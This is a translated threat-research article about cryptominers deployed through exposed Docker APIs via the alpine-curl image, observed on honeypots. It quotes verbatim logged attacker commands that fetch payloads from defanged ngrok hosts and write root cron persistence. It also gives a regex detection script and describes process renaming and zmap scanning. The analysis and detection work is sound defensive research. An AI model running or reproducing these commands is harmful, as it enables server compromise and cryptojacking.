
The data was collected using honeypots that we built to track threats. We observed significant activity from unwanted or unauthorized cryptocurrency miners deployed as rogue containers using a community-published image on Docker Hub. The image is used as part of a service that delivers malicious cryptocurrency miners.
In addition, network tools are deployed to penetrate neighbouring exposed containers and applications.
We left our honeypots as they were, that is, with default settings, without any security measures or additional software installed. Note that Docker publishes recommendations for initial setup that avoid errors and simple vulnerabilities. The honeypots used, however, are containers designed to detect attacks aimed at the containerization platform, not at the applications inside the containers.
The malicious activity detected is notable because it requires no vulnerability and does not depend on the Docker version. Finding a misconfigured, and therefore exposed, container image is all attackers need to compromise many open servers.
An unprotected Docker API lets a user perform a wide range of actions, including listing the running containers, retrieving logs from a particular container, starting and stopping containers (including forced stops), and even creating a new container from a given image with specified settings.

On the left is the malware delivery method. On the right is the attacker's environment, which allows remote deployment of images.

Distribution by country of 3762 exposed Docker APIs. Based on a Shodan search on 12.02.2019
Attack chain and payload options
The malicious activity was detected not only with the help of honeypots. Shodan data shows that the number of exposed Docker APIs (see the second figure) has grown since we investigated a misconfigured container used as a bridge for deploying Monero cryptocurrency mining software. In October of last year (2018; the data is approximately current, translator's note) there were only 856 exposed APIs.
Analysis of the honeypot logs showed that the use of container images was also associated with the use of ngrok, a tool for establishing secure connections or forwarding traffic from publicly reachable endpoints to specified addresses or resources (for example, localhost). This lets attackers dynamically create URLs when delivering payloads to an exposed server. Below are code examples from the logs showing abuse of the ngrok service:
Tty: false
Command: "-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c "cron || crond"",
Entrypoint: "/bin/sh"
Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c "cron || crond"",
Entrypoint: "/bin/sh"
Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c "cron || crond"",
Entrypoint: "/bin/sh",
Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c "cron || crond"",
Entrypoint: "/bin/sh"

As you can see, the files are downloaded from constantly changing URLs. These URLs have a short expiry, so the payloads cannot be downloaded once they have expired.
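The container-create records above share a recognisable shape: a curl download from a throwaway ngrok hostname, a crontab written under a chrooted host path, and cron started inside the chroot. The following detection logic, added here as an example and not code from the original post, runs over constructed records modelled on that excerpt and flags the ones that show at least two stages of the chain.

```python
import re

# Constructed sample records, modelled on the container-create entries quoted above
# (hostnames kept defanged as in the post; these are not the post's own log lines).
SAMPLE_RECORDS = [
    {"Tty": False, "Entrypoint": "/bin/sh",
     "Cmd": ('-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfile '
             '"hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";'
             'echo "* * * * * root sh /tmp/tmpfile" >/tmp9bedce/etc/crontab;'
             'echo "* * * * * root sh /tmp/tmpfile" >/tmp9bedce/etc/cron.d/1m;'
             'chroot /tmp9bedce sh -c "cron || crond"')},
    # A benign create request, for contrast.
    {"Tty": True, "Entrypoint": "/bin/sh",
     "Cmd": "-c apk add --no-cache curl && curl -s https://example.invalid/health"},
]

# Each rule targets one stage of the chain described in the post.
RULES = {
    "download_from_ngrok_tunnel": re.compile(r"curl[^;]*ngrok\[?\.\]?io", re.I),
    "cron_persistence_write": re.compile(r">\s*/\S*/etc/(crontab|cron\.d/)", re.I),
    "chroot_cron_start": re.compile(r"chroot\s+\S+\s+sh\s+-c\s+[\"']?crond?\b", re.I),
}

def classify(record):
    """Return the sorted names of the rules a container-create record trips.

    Both "Cmd" and "Command" spellings appear in the excerpt, so accept either.
    """
    cmd = record.get("Cmd") or record.get("Command") or ""
    return sorted(name for name, rx in RULES.items() if rx.search(cmd))

def is_suspicious(record):
    """Flag a record when at least two stages of the chain are present.

    A lone download or a lone crontab write can be legitimate automation;
    download plus cron persistence (or cron start) is the pattern seen here.
    """
    return len(classify(record)) >= 2

def triage(records):
    """Map each record index to its rule hits, for the records worth a look."""
    return {i: classify(r) for i, r in enumerate(records) if is_suspicious(r)}
```

The rules are deliberately narrow to the tradecraft in this excerpt; a production detection would also key on the Docker API call itself (container create from a remote, non-loopback client) rather than only on the command string.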
There are two payload options. The first is an ELF executable compiled for Linux (detected as Coinminer.SH.MALXMR.ATNO), which connects to a mining pool. The second is a script (TrojanSpy.SH.ZNETMAP.A), designed to fetch certain network tools that are used to scan network ranges and then search for new targets.
The dropper script sets two variables, which are then used to deploy the cryptocurrency miner. The HOST variable contains the URL where the malicious files are located, and the RIP variable is the file name (in fact, the hash) of the miner to be deployed. The HOST variable changes every time the hash variable changes. The script also tries to make sure that no other cryptocurrency miners are running on the attacked server.

Examples of different HOST and RIP values, and the code snippet used to check that no other miners are running.
Before the miner is started, it is renamed to nginx. Other versions of this script rename the miner process to other legitimate services that might be present in a Linux environment. This is usually enough to bypass checks against the list of running processes.
The scanning script also has some notable features. It works with the same URL service to deploy the required tools. Among them is the zmap binary, which is used to scan networks and obtain a list of open ports. The script also loads another binary that is used to interact with the discovered services and receive banners from them, in order to learn more about the discovered service (for example, its version).
The script also predefines certain network ranges to scan, but this depends on the script version. It also sets the target ports for these services, in this case Docker, before starting the scan.
Once potential targets are found, banners are automatically retrieved from them. The script also filters targets by the services, applications, components or platforms it is interested in: Redis, Jenkins, Drupal, MODX, , Docker client 1.16 and Apache CouchDB. If a scanned server matches any of them, it is saved to a file, which the attackers can later use for analysis and exploitation. These files are uploaded to the attackers' servers via dynamic links. That is, a separate link is used for each file, which makes subsequent access difficult.
The attack vector is a Docker image, as we see in the following two sections.

Above is the renaming to a legitimate service, and below is how zmap is used to scan networks.

Above are the predefined networks; below are the specific ports used to search for services, including Docker.

The screenshot shows that the alpine-curl image has been downloaded more than 10 million times.
Based on Alpine Linux and curl, a CLI tool for efficiently transferring files over various protocols, the alpine-curl image can be built. As you can see in the previous screenshot, this image has already been downloaded more than 10 million times. A large number of downloads may indicate that this image is used as an entry point; the image was updated more than six months ago; users did not download other images from this repository as often. In Docker, the entrypoint is the set of instructions used to configure a container for running. If the entrypoint settings are incorrect (for example, the container is left exposed to the internet), the image can be used as an attack vector. Attackers can use it to deliver payloads if they find a misconfigured or exposed container that has been left unmaintained.
It is important to note that this image (alpine-curl) is not itself malicious, but as shown above, it can be used to carry out malicious functions. Similar Docker images can also be used for malicious activity. We contacted Docker and worked with them on this issue.
Recommendations
Misconfiguration remains a problem for many companies, especially those adopting DevOps, which focuses on rapid development and deployment. Everything is aggravated by the need to comply with audit and monitoring rules, the need to oversee data confidentiality, and the enormous damage of non-compliance. Building security automation into the development lifecycle not only helps find security holes that might otherwise go unnoticed, but also helps reduce unnecessary work, such as running additional software builds for every vulnerability or misconfiguration discovered after the application has been deployed.
What we have discussed in this article shows the need to consider security from the very beginning, including the following:
- For system administrators and developers: always check your API settings to make sure everything is configured to accept requests only from a specific server or the internal network.
- Follow the principle of least privilege: make sure container images are signed and verified, restrict access to critical components (the container launch service) and add encryption to network connections.
- Follow and apply security guidelines, e.g. and the built-in .
- Use runtime and image scanning tools to learn more about the processes running in the container (for example, to detect spoofing or search for vulnerabilities). Application control and integrity monitoring help track abnormal changes to servers, files and system areas.
Trend Micro helps DevOps teams build securely, release quickly and deploy anywhere. Trend Micro provides powerful, streamlined and automated security for DevOps team pipelines and offers multiple threat defenses to protect physical, virtual and cloud workloads at runtime. It also adds container security with and , which scan Docker container images for malware and vulnerabilities at any stage of the development pipeline to stop threats before deployment.
Indicators of compromise
Related hashes:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
The training speakers show the settings that should be configured first to reduce the likelihood of, or avoid altogether, the scenarios described above. And on August 19-21, at the online intensive, you can discuss these and similar security issues with colleagues and take part in a round table with the instructors, where everyone can speak and hear about the pains and successes of experienced colleagues.
Source: www.habr.com
